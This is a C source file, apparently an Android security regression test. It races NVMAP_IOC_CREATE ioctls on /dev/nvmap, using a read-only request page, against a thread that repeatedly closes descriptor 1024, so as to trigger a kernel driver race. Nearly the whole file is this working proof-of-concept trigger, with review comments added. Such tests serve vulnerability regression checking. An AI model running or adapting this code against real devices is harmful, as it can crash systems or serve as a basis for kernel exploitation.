1 /*
2 * Copyright (C) 2017 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #define _GNU_SOURCE
17 #include <stdlib.h>
18 #include <errno.h>
19 #include <unistd.h>
20 #include <stdio.h>
21 #include <dirent.h>
22 #include <string.h>
23 #include <sys/stat.h>
24 #include <sys/ioctl.h>
25 #include <stdio.h>
26 #include <string.h>
27 #include <dlfcn.h>
28 #include <sys/time.h>
29 #include <sys/mman.h>
30 #include <sys/syscall.h>
31 #include <sys/resource.h>
32 #include <fcntl.h>
33 #include <pthread.h>
34 #include <unistd.h>
35 #include <sched.h>
36
/*
 * nvmap heap selectors. This file includes no nvmap header, so the values
 * below are local copies.
 * NOTE(review): presumably taken from the driver's UAPI header -- confirm
 * against the kernel tree under test, since a mismatch would make the test
 * exercise a different request than intended.
 * Only NVMAP_HEAP_CARVEOUT_GENERIC is used in this file (trigger_nvmap_alloc).
 */
#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)

/*
 * NVMAP_HEAP_IOVMM is not defined in the visible file. Nothing here expands
 * this macro, which is why the file still compiles; any use of it would not.
 */
#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)

/* allocation flags */
/* Bits 0-1 hold the cache attribute; NVMAP_HANDLE_CACHE_FLAG (0x3) spans them. */
#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)

/*
 * Single-bit flags from bit 2 upward. Only NVMAP_HANDLE_ZEROED_PAGES is used
 * in this file (trigger_nvmap_alloc).
 */
#define NVMAP_HANDLE_SECURE (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
/*
 * Argument block for NVMAP_IOC_PARAM. Declared for completeness; no code in
 * this file issues that ioctl.
 * `result` is an unsigned long, so the struct's size follows the build's
 * word size (32-bit vs 64-bit).
 */
struct nvmap_handle_param {
    __u32 handle; /* nvmap handle */
    __u32 param; /* size/align/base/heap etc. */
    unsigned long result; /* returns requested info*/
};

/*
 * Argument block shared by the CREATE / GET_ID / GET_FD / FROM_FD ioctls.
 * `id`, `size` and `fd` are members of one anonymous union, so they occupy
 * the same four bytes: writing one of them sets the other two as well.
 * `handle` is the output field the driver fills in.
 */
struct nvmap_create_handle {
    union {
        __u32 id; /* FromId */
        __u32 size; /* CreateHandle */
        __s32 fd; /* DmaBufFd or FromFd */
    };
    __u32 handle; /* returns nvmap handle */
};

/* Argument block for NVMAP_IOC_ALLOC; filled in by trigger_nvmap_alloc(). */
struct nvmap_alloc_handle {
    __u32 handle; /* nvmap handle */
    __u32 heap_mask; /* heaps to allocate from */
    __u32 flags; /* wb/wc/uc/iwb etc. */
    __u32 align; /* min alignment necessary */
};
79
/*
 * ioctl request numbers for the nvmap device, all built on magic 'N'.
 * _IOWR requests carry a struct the driver both reads and writes back,
 * _IOW requests are read by the driver only, and NVMAP_IOC_FREE (_IO)
 * declares no argument struct -- trigger_nvmap_free() passes a plain int.
 * main() only ever reaches NVMAP_IOC_CREATE; PARAM, GET_ID and GET_FD are
 * not issued anywhere in this file.
 */
#define NVMAP_IOC_MAGIC 'N'
#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)

/* Descriptor for /dev/nvmap; set by open_driver(), -1 until then. */
int g_fd = -1;

/* Start gate: race_thread() waits on cond, main() signals it once. */
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;

/*
 * Request block passed to NVMAP_IOC_CREATE. prepare_data() points this at a
 * page-aligned buffer and then makes that page read-only.
 */
struct nvmap_create_handle* g_allocation = NULL;

/* Separate, writable request block used only by trigger_nvmap_create_dup(). */
struct nvmap_create_handle g_allocation_dup;
93
/*
 * Open the nvmap device node read/write and record the descriptor.
 *
 * The result of open() is stored in the global g_fd and also returned:
 * a descriptor on success, a negative value on failure. One status line
 * is printed either way; the failure line includes errno.
 */
int open_driver() {
    static const char node[] = "/dev/nvmap";

    g_fd = open(node, O_RDWR);
    if (g_fd >= 0) {
        printf("[*] open file(%s) succ!\n", node);
        return g_fd;
    }

    printf("[*] open file(%s) failed, errno=%d\n", node, errno);
    return g_fd;
}
104
/*
 * Issue NVMAP_IOC_CREATE on g_fd with the request block g_allocation
 * points to.
 *
 * The ioctl's return value is discarded, so the caller never learns whether
 * the request succeeded. By the time main() calls this, prepare_data() has
 * made the page holding the request block read-only from user space.
 */
void trigger_nvmap_create() {
    struct nvmap_create_handle *request = g_allocation;

    (void)ioctl(g_fd, NVMAP_IOC_CREATE, request);
}
108
/*
 * Issue NVMAP_IOC_FROM_FD for descriptor `fd`, using the writable global
 * request block g_allocation_dup.
 *
 * The ioctl's return value is discarded. Nothing in this file calls this
 * helper.
 */
void trigger_nvmap_create_dup(int fd) {
    struct nvmap_create_handle *request = &g_allocation_dup;

    request->fd = fd;
    (void)ioctl(g_fd, NVMAP_IOC_FROM_FD, request);
}
113
/*
 * Issue NVMAP_IOC_ALLOC for the handle currently stored in
 * g_allocation->handle: generic carveout heap, zeroed pages, 0x1000
 * alignment.
 *
 * The ioctl's return value is discarded. Nothing in this file calls this
 * helper.
 */
void trigger_nvmap_alloc() {
    struct nvmap_alloc_handle request = {
        .handle = g_allocation->handle,
        .heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC,
        .flags = NVMAP_HANDLE_ZEROED_PAGES,
        .align = 0x1000,
    };

    (void)ioctl(g_fd, NVMAP_IOC_ALLOC, &request);
}
122
/*
 * Issue NVMAP_IOC_FREE on g_fd, passing `fd` by value as the ioctl argument
 * (the request number is declared with _IO, i.e. without an argument struct).
 *
 * The ioctl's return value is discarded. Nothing in this file calls this
 * helper.
 */
void trigger_nvmap_free(int fd) {
    const int target = fd;

    (void)ioctl(g_fd, NVMAP_IOC_FREE, target);
}
126
/*
 * Set the calling thread's scheduling priority and CPU affinity.
 *
 * privi     nice value handed to setpriority() for this thread id.
 * cpu_mask  bit mask of allowed CPUs, handed to sched_setaffinity().
 *
 * Both return values are ignored, so a caller cannot tell whether either
 * setting took effect (lowering the nice value normally needs privilege).
 * NOTE(review): &cpu_mask is an unsigned long *, while sched_setaffinity()
 * is declared to take a cpu_set_t *; compilers warn about the mismatch.
 */
void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
    const pid_t self = gettid();

    (void)setpriority(PRIO_PROCESS, self, privi);

    /* bind the calling thread to the CPUs in cpu_mask; failure is ignored */
    (void)sched_setaffinity(self, sizeof(cpu_mask), &cpu_mask);
}
134
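/*
 * Allocate the request block used with NVMAP_IOC_CREATE and make its first
 * page read-only.
 *
 * A 4-page, page-aligned buffer is allocated, g_allocation is pointed at its
 * start, size is set to 1024 and handle to -1 (0xFFFFFFFF once stored in the
 * __u32), and only then is write permission dropped from the first page.
 * The buffer is never freed; it lives for the whole process.
 *
 * If the allocation or the mprotect() call fails the process exits, because
 * every later step depends on this setup and a run without it would say
 * nothing about the driver.
 */
void prepare_data() {
    void *data = memalign(0x1000, 4 * 0x1000);

    if (data == NULL) {
        printf("[*] memalign failed, errno=%d\n", errno);
        exit(EXIT_FAILURE);
    }
    printf("[*] data = %p\n", data);

    /* The fields must be written before the page loses write permission. */
    g_allocation = data;
    g_allocation->size = 1024;
    g_allocation->handle = -1;

    /* Clear errno first so the line below reports 0 on success, not a stale value. */
    errno = 0;
    int rc = mprotect(data, 0x1000, PROT_READ);
    printf("[*] mprotect, error = %d\n", errno);
    if (rc != 0) {
        exit(EXIT_FAILURE);
    }
}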
145
/*
 * Body of the second thread: wait for main()'s signal, then close
 * descriptor number 1024 in a tight loop, forever.
 *
 * The thread first asks for nice -10 and CPU mask 2, then blocks on `cond`.
 * close() on a number that is not open simply fails, and that result is
 * ignored. The function never returns; `arg` is unused.
 *
 * NOTE(review): 1024 is also the value prepare_data() stores in
 * g_allocation->size, which shares storage with .fd in the request union --
 * presumably deliberate; confirm against the driver source.
 * NOTE(review): the wait has no predicate, so a signal sent before this
 * thread reaches pthread_cond_wait() is lost and the loop never starts.
 */
void* race_thread(void* arg) {
    (void)arg;

    setup_privi_and_affinity(-10, 2);

    /* park until main() signals cond */
    pthread_mutex_lock(&mutex);
    pthread_cond_wait(&cond, &mutex);
    pthread_mutex_unlock(&mutex);

    for (;;) {
        close(1024);
    }
}
156
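/*
 * Test driver: open /dev/nvmap, prepare the read-only request block, start
 * race_thread(), release it, then issue NVMAP_IOC_CREATE in an endless loop.
 *
 * Returns -1 if the device cannot be opened or the second thread cannot be
 * created. Otherwise it never returns: the process runs until it is killed
 * or the system under test fails, so it needs an external timeout.
 *
 * NOTE(review): the 100 ms sleep is the only thing ordering the signal after
 * race_thread()'s wait. If the thread has not reached pthread_cond_wait()
 * by then, the signal is lost and only this loop runs, so a quiet run is
 * not by itself evidence that the driver is fixed.
 */
int main(int argc, char**argv) {
    (void)argc;
    (void)argv;

    setup_privi_and_affinity(-10, 1);

    if (open_driver() < 0) {
        return -1;
    }
    prepare_data();

    /* Without the second thread the run is meaningless, so stop here. */
    pthread_t tid;
    int rc = pthread_create(&tid, NULL, race_thread, NULL);
    if (rc != 0) {
        printf("[*] pthread_create failed, error = %d\n", rc);
        return -1;
    }
    usleep(100 * 1000);

    pthread_cond_signal(&cond);
    usleep(20);
    for (;;) {
        trigger_nvmap_create();
    }
}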